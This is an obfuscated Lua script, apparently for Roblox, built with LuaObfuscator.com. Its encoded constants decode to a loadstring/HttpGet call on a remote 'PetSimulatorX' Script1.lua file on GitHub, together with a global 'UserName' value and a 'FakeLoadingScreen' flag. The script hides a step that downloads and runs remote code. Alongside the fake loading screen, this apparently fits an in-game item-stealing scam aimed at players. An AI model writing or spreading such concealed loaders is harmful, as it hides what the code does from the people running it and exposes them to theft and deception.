--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=function(v31,v32,v33)if v33 then local v69=0 -(0 + 0);local v70;while true do if (v69==(0 -0)) then v70=(v31/((1134 -(949 + 183))^(v32-1)))%(((717 -352) -(301 + 62))^(((v33-1) -(v32-1)) + 1 + 0));return v70-(v70%(3 -2));end end else local v71=(1251 -719) -(372 + 160);local v72;while true do if (v71==(0 -(0 + 0))) then v72=(353 -((888 -644) + 107))^(v32-((1272 -(29 + 1242)) -0));return (((v31%(v72 + v72))>=v72) and (1 -0)) or (0 -0);end end end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1;return v39;end;v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then v20=v0(v3(v34,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v34,16));if v20 then local v85=v5(v74,v20);v20=nil;return v85;else return v74;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v40=0 + 0;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v40==(1 + 2)) then v47=nil;while true do local v78=885 -(51 + 834);while true do if (v78~=0) then else local v86=0 -0;while true do if (v86==0) then if (v41~=(1525 -(837 + 688))) then else local v106=1923 -(1751 + 172);while true do if (v106==(0 + 0)) then v42={};v43={};v106=1 + 0;end if (v106==1) then v44={};v41=2 -1;break;end end end if (v41==(6 -3)) then local v107=0;while true do if (v107==(0 -0)) then local v115=0 + 0;while true do if (v115==(2 -1)) then v107=1 + 0;break;end if (v115~=(0 + 0)) then else for v135=1 + 0,v24() do v43[v135-1]=v29();end for v137=1 + 0,v24() do v44[v137]=v24();end v115=1 + 0;end end end if (v107~=(545 -(396 + 148))) then else return v45;end end end v86=1714 -(937 + 776);end if (v86~=1) then else v78=1;break;end end end if (v78==(1 + 0)) then if (v41==(2 -1)) then v45={v42,v43,nil,v44};v46=v24();v47={};v41=587 -(86 + 499);end if (v41==(2 + 0)) then local v98=431 -(178 + 253);while true do if (v98~=(1 + 0)) then else for v110=68 -(48 + 19),v24() do local v111=0 + 0;local v112;local v113;local v114;while true do if ((2 -1)~=v111) then else v114=nil;while true do if (v112==(982 -(582 + 399))) then while true do if (v113==(1914 -(156 + 1758))) then v114=v22();if (v21(v114,1 + 0,2 -1)==(0 + 0)) then local v159=1021 -(515 + 506);local v160;local v161;local v162;local v163;local v164;while true do if (2~=v159) then else v164=nil;while true do if (v160~=(1 + 1)) then else while true do if (v161~=2) then else local v185=1809 -(657 + 1152);local v186;while true do if (v185==(0 + 0)) then v186=0 -0;while true do if (v186==(1 + 0)) then v161=12 -9;break;end if (v186==0) then if (v21(v163,1 + 0,1)==(3 -2)) then v164[2]=v47[v164[2]];end if (v21(v163,8 -6,1 + 1)~=(1 + 0)) then else v164[3]=v47[v164[3 + 0]];end v186=1008 -(328 + 679);end end break;end end end if (v161==0) then local v187=0;local v188;while true do if (v187==(0 -0)) then v188=0;while true do if (v188~=(2 -1)) then else v161=292 -(161 + 130);break;end if (v188==(0 + 0)) then local v198=0;while true do if (v198~=(3 -2)) then else v188=1;break;end if (v198==(1869 -(1525 + 344))) then v162=v21(v114,1862 -(479 + 1381),1521 -(69 + 1449));v163=v21(v114,2 + 2,4 + 2);v198=1 + 0;end end end end break;end end end if (v161==(137 -(4 + 132))) then local v189=1818 -(1238 + 580);while true do if (v189~=(0 + 0)) then else local v196=0;while true do if (v196==(1528 -(1019 + 508))) then v189=251 -(115 + 135);break;end if ((908 -(746 + 162))==v196) then local v199=0;while true do if ((0 -0)==v199) then v164={v23(),v23(),nil,nil};if (v162==(0 + 0)) then local v204=0 -0;local v205;while true do if (v204==0) then v205=693 -(300 + 393);while true do if (v205==(0 -0)) then v164[883 -(737 + 143)]=v23();v164[1019 -(476 + 539)]=v23();break;end end break;end end elseif (v162==(1 + 0)) then v164[3]=v24();elseif (v162==2) then v164[3 + 0]=v24() -((5 -3)^16);elseif (v162==(139 -(134 + 2))) then local v210=0;local v211;while true do if (v210==(0 + 0)) then v211=0;while true do if (v211~=(0 -0)) then else v164[1429 -(541 + 885)]=v24() -((336 -(26 + 308))^(7 + 9));v164[910 -(205 + 701)]=v23();break;end end break;end end end v199=1 -0;end if (v199==(2 -1)) then v196=1 + 0;break;end end end end end if (v189~=(1 + 0)) then else v161=372 -(238 + 132);break;end end end if (v161==3) then if (v21(v163,1269 -(854 + 412),1626 -(1175 + 448))~=(1955 -(927 + 1027))) then else v164[1571 -(22 + 1545)]=v47[v164[6 -2]];end v42[v110]=v164;break;end end break;end if (v160~=(4 -3)) then else local v180=0 + 0;local v181;while true do if (v180~=(0 + 0)) then else v181=0 + 0;while true do if (1==v181) then v160=2;break;end if (v181~=(1627 -(1259 + 368))) then else v163=nil;v164=nil;v181=1 + 0;end end break;end end end if (v160==(1437 -(642 + 795))) then local v182=0;while true do if (v182==(0 + 0)) then v161=0 -0;v162=nil;v182=1;end if ((1 + 0)~=v182) then else v160=1;break;end end end end break;end if (v159==(27 -(5 + 22))) then v160=1343 -(782 + 561);v161=nil;v159=1 + 0;end if (v159==1) then v162=nil;v163=nil;v159=4 -2;end end end break;end end break;end if ((1034 -(372 + 662))==v112) then v113=0;v114=nil;v112=1 + 0;end end break;end if ((753 -(702 + 51))==v111) then v112=0;v113=nil;v111=2 -1;end end end v41=1130 -(828 + 299);break;end if (v98==0) then local v108=0 -0;while true do if (v108==(1790 -(1595 + 194))) then v98=1 + 0;break;end if (v108~=(0 -0)) then else for v119=1 + 0,v46 do local v120=0 -0;local v121;local v122;local v123;while true do if ((1316 -(268 + 1047))==v120) then v123=nil;while true do if (v121==1) then if (v122==(1 + 0)) then v123=v22()~=0;elseif (v122==(1 + 1)) then v123=v25();elseif (v122==3) then v123=v26();end v47[v119]=v123;break;end if (v121==0) then local v153=0 -0;local v154;local v155;while true do if (v153==(0 -0)) then v154=0;v155=nil;v153=1 -0;end if (v153~=(1863 -(894 + 968))) then else while true do if (v154==(0 -0)) then v155=0 + 0;while true do if (v155==(1 + 0)) then v121=2 -1;break;end if (v155==0) then local v183=0;local v184;while true do if ((0 + 0)==v183) then v184=0;while true do if ((1 + 0)==v184) then v155=1905 -(1131 + 773);break;end if (v184~=0) then else local v197=0;while true do if (v197==(0 -0)) then v122=v22();v123=nil;v197=1118 -(102 + 1015);end if (v197==(1665 -(1508 + 156))) then v184=1;break;end end end end break;end end end end break;end end break;end end end end break;end if (v120~=(0 + 0)) then else local v139=0;while true do if (v139==0) then local v156=0 -0;while true do if (v156==(0 -0)) then v121=146 -(113 + 33);v122=nil;v156=1 + 0;end if (v156==(3 -2)) then v139=1;break;end end end if (v139~=(1 + 0)) then else v120=1;break;end end end end end v45[1516 -(1366 + 147)]=v22();v108=2 -1;end end end end end break;end end end break;end if ((2 + 0)==v40) then v45=nil;v46=nil;v40=3;end if (v40==(1 + 0)) then v43=nil;v44=nil;v40=1 + 1;end if (v40~=0) then else v41=947 -(559 + 388);v42=nil;v40=2 -1;end end end;v18=5;end if (v18==3) then v25=function()local v48=0 + (0 -0);local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==((1086 -(5 + 1081)) -0)) then v49=v24();v50=v24();v48=1032 -(706 + 325);end if (v48==(1 + 1)) then v53=v21(v50,20 + 1,54 -23);v54=((v21(v50,8 + 24)==(1 -0)) and  -(706 -(318 + 387))) or ((2 -1) + (0 -0));v48=1216 -((1332 -(1115 + 52)) + 1048);end if (v48==(1 + 0)) then v51=1331 -(293 + 1037);v52=(v21(v50,1 + 0,1421 -(41 + 1360)) * ((1 + 1)^(87 -55))) + v49;v48=1 + 0 + 1;end if (v48==(2 + 1)) then if (v53==(806 -(132 + (1754 -1080)))) then if (v52==(660 -(554 + 106))) then return v54 * ((1415 -(1256 + 159)) + 0);else local v87=(1524 -(711 + 813)) + 0;while true do if (v87==(723 -(347 + 376))) then v53=1;v51=323 -(126 + 110 + 87);break;end end end elseif (v53==(1146 + 901)) then return ((v52==(0 -(176 -(74 + 102)))) and (v54 * ((3 -2)/((3518 -1747) -(27 + 1744))))) or (v54 * NaN);end return v8(v54,v53-(1452 -(248 + (1802 -(820 + 801))))) * (v51 + (v52/((1331 -(760 + 569))^(1566 -(1114 + (1258 -(841 + 17)))))));end end end;v26=nil;v26=function(v35)local v55;if  not v35 then v35=v24();if (v35==(0 + 0)) then return "";end end v55=v3(v16,v19,(v19 + v35) -(1 + 0));v19=v19 + v35;local v56={};for v67=1 + 0, #v55 do v56[v67]=v2(v1(v3(v55,v67,v67)));end return v6(v56);end;v27=v24;v18=4;end if (v18==5) then v30=nil;v30=function(v36,v37,v38)local v57=0;local v58;local v59;local v60;while true do if (v57==1) then v60=v36[3];return function(...)local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==3) then A,B=v28(v11(v84));if  not A[1] then local v99=v36[4][v80] or "?";error("Script error at ["   .. v99   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v79==0) then v80=1;v81= -1;v79=1;end if (v79==1) then v82={...};v83=v12("#",...) -1;v79=2;end if (v79==2) then v84=nil;v84=function()local v88=v58;local v89=v59;local v90=v60;local v91=v28;local v92={};local v93={};local v94={};for v100=0 + 0,v83 do if (((1 + 707)<=(2419 -(867 + 23 + 318))) and (v100>=v90)) then v92[v100-v90]=v82[v100 + (3 -2)];else v94[v100]=v82[v100 + (2 -1)];end end local v95=(v83-v90) + (1893 -(1556 + 218 + 118));local v96;local v97;while true do local v101=0 + 0;while true do if ((((7964 -(102 + 111)) -3871)>3346) and ((1 + 0)==v101)) then if ((v97<=(22 -17)) or ((431 + 159)>=2106)) then if ((v97<=(685 -(646 + 37))) or ((5316 -2730)>=(2549 + 410))) then if (((155 + 109)<=(4263 -2988)) and (v97<=(0 + 0))) then v94[v96[1709 -(319 + 718 + 670)]]=v96[4 -1];elseif ((v97==1) or (1613<(3036 -1447))) then local v140=0;local v141;local v142;while true do if (((1330 + 1189)>=(1028 -(78 + 760))) and ((1 + (0 -0))==v140)) then while true do if ((v141==(0 + 0)) or ((5160 -(207 + 1145))<=(13312 -9944))) then v142=v96[2];v94[v142]=v94[v142](v13(v94,v142 + 1 + 0,v81));break;end end break;end if (((4159 -(353 + 737))<=(3938 + 335)) and (v140==(0 -0))) then v141=0;v142=nil;v140=22 -(17 + (1925 -(1527 + 394)));end end else v80=v96[3 + 0];end elseif (((1656 + 1272)<=(6429 -(1274 + 263))) and (v97<=(1 + 2))) then v94[v96[2 + 0]]();elseif ((2135<=3331) and (v97==(6 -2))) then v94[v96[8 -6]][v96[3]]=v96[4];else for v150=v96[1 + 1],v96[2 + 1] do v94[v150]=nil;end end elseif (((1314 + 2105 + 12)>((3470 -1387) + 952)) and (v97<=(1483 -(130 + (2353 -(716 + 292)))))) then if (((1088 + 879)>=(1592 -(732 + 291))) and (v97<=6)) then local v126=0 -0;local v127;local v128;local v129;local v130;local v131;local v132;while true do if ((v126==(880 -((383 -189) + 686))) or ((13161 -(5660 + 2924))==(5382 -(775 + 310)))) then v127=0 -0;v128=nil;v126=1;end if (((503 + 3126)==(1112 + 2517)) and (v126==(4 -3))) then v129=nil;v130=nil;v126=3 -(3 -2);end if ((((4802 -(1043 + 176)) -1666)==(4193 -2276)) and (v126==(1 + 1 + 1))) then while true do if (((552 + 611)<(914 + 786 + 601)) and (v127==(2 + 0))) then v132=nil;while true do if ((v128==(0 + 0)) or ((2029 + 676)<(818 -(64 + 43)))) then local v173=0;local v174;while true do if ((v173==(1388 -(983 + 405))) or ((1229 + 3267)<=1458)) then v174=0 -(555 -(76 + 479));while true do if (((12218 -8960)==(1611 + 1647)) and ((0 + 0)==v174)) then v129=v96[1 + 1];v130,v131=v91(v94[v129](v13(v94,v129 + (706 -(517 + 188)) + 0,v96[900 -(811 + 86)])));v174=1 + (1744 -(1624 + 120));end if ((v174==((1 + 0) -0)) or ((139 + 687)>=((8021 -(126 + 360)) -5548))) then v128=1 + 0;break;end end break;end end end if (((2613 -1553)<3862) and (v128==2)) then for v177=v129,v81 do local v178=(1251 -(334 + 917)) + 0;local v179;while true do if ((((7145 -(834 + 516)) -(512 + 1106))>(4190 -1428)) and (v178==0)) then v179=0 + 0;while true do if (((108 -35)<=(2526 -(169 + 38))) and (v179==(0 -0))) then v132=v132 + 1;v94[v177]=v130[v132];break;end end break;end end end break;end if (((1027 -(271 + 575))<=1726) and (v128==(1034 -(230 + 803)))) then local v175=0 -0;local v176;while true do if ((v175==((5260 -3444) -(1129 + 687))) or ((3072 + 239)<(545 -236))) then v176=0;while true do if ((v176==(2 -1)) or (2707>(627 + 4293))) then v128=2;break;end if ((384==(346 + 38)) and (v176==(1553 -((2135 -1367) + 785)))) then v81=(v131 + v129) -(1 -0);v132=0;v176=1 + 0;end end break;end end end end break;end if (((1030 + (3443 -(69 + 1497)))>(2537 -(339 + 878))) and (v127==(2 -1))) then local v165=921 -(172 + 749);while true do if ((v165==(1 + 0)) or ((9682 -5609)==473)) then v127=2;break;end if (((727 + 899)<3885) and (v165==(0 + 0 + 0))) then v130=nil;v131=nil;v165=1;end end end if ((v127==(0 + 0)) or ((2409 -((136 -81) + 45))==(5423 -2857))) then v128=(1031 -(960 + 71)) + 0;v129=nil;v127=1;end end break;end if (((8043 -6018)<=(4623 -(106 + 1493))) and (v126==(1 + 1))) then v131=nil;v132=nil;v126=4 -1;end end elseif ((v97==(1612 -(1603 + 2))) or (1291>(5539 -2648))) then if ((v96[2]==v94[v96[4]]) or (1451>=(5306 -(634 + (2018 -(791 + 1140)))))) then v80=v80 + 1;else v80=v96[6 -3];end else do return;end end elseif (((2498 + 878)==(5375 -1999)) and (v97<=(4 + 5))) then v94[v96[2]]=v38[v96[4 -1]];elseif (((637 + 1861)<=(865 + 2619)) and (v97==10)) then if (((171 -90)<=(3622 -2607)) and (v94[v96[518 -(261 + 255)]]==v96[8 -4])) then v80=v80 + (165 -(60 + 104));else v80=v96[746 -(369 + 374)];end else local v146=628 -(463 + 165);local v147;local v148;local v149;while true do if ((((1778 -520) + (2304 -(1183 + 362)))>=(4905 -(3922 -(507 + 371)))) and (v146==0)) then v147=0 -0;v148=nil;v146=238 -(50 + 187);end if (((8953 -5969)>=2939) and (v146==((1724 -503) -(1056 + 50 + 114)))) then v149=nil;while true do if (((5284 -(340 + 916))>(4614 -3231)) and (0==v147)) then v148=v96[2 + 0];v149=v94[v96[553 -(232 + 318)]];v147=657 -(645 + 11);end if ((v147==(3 -2)) or ((545 -352)==4397)) then v94[v148 + 1]=v149;v94[v148]=v149[v96[4]];break;end end break;end end end v80=v80 + (421 -(286 + 134));break;end if ((v101==(563 -(135 + 428))) or ((9198 -5645)>=(3120 + 1730))) then local v109=1827 -(781 + 1046);while true do if (((2144 -(678 + 860 + 174))<(4082 -(801 + 973))) and (v109==0)) then v96=v88[v80];v97=v96[1 + 0];v109=1 + 0;end if ((v109==1) or ((1359 -(911 + 384))>(254 + 1616))) then v101=259 -(114 + 144);break;end end end end end end;v79=3;end end end;end if (v57==0) then v58=v36[1];v59=v36[2];v57=1;end end end;return v30(v29(),{},v17)(...);end if (v18==2) then v23=function()local v61,v62=v1(v16,v19,v19 + 2 + 0);v19=v19 + (2 -0);return (v62 * (536 -(39 + 241))) + v61;end;v24=nil;v24=function()local v63,v64,v65,v66=v1(v16,v19,v19 + 3);v19=v19 + 3 + 1;return (v66 * (16779104 -(1818 + 70))) + (v65 * 65536) + (v64 * (176 + 80)) + v63;end;v25=nil;v18=3;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507269736D5363726970742F50657453696D756C61746F72582F6D61696E2F536372697074312E6C756103023O005F4703083O00557365724E616D6503073O004B77742O652O6E03113O0046616B654C6F6164696E675363722O656E2O01001A3O00124O00014O0005000100013O000E070001000200013O0004023O0002000100122O000100013O00260A0001000F000100020004023O000F0001001209000200033O001209000300043O00200B00030003000500122O000500064O0006000300054O000100023O00022O00030002000100010004023O0019000100260A00010005000100010004023O00050001001209000200073O003004000200080009001209000200073O0030040002000A000B00122O000100023O0004023O000500010004023O001900010004023O000200012O00083O00017O001A3O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O00093O00093O00093O00093O000A3O000C3O000C3O000D3O000D3O000E3O000E3O000F3O00103O00123O00133O00153O00",v9(),...);end
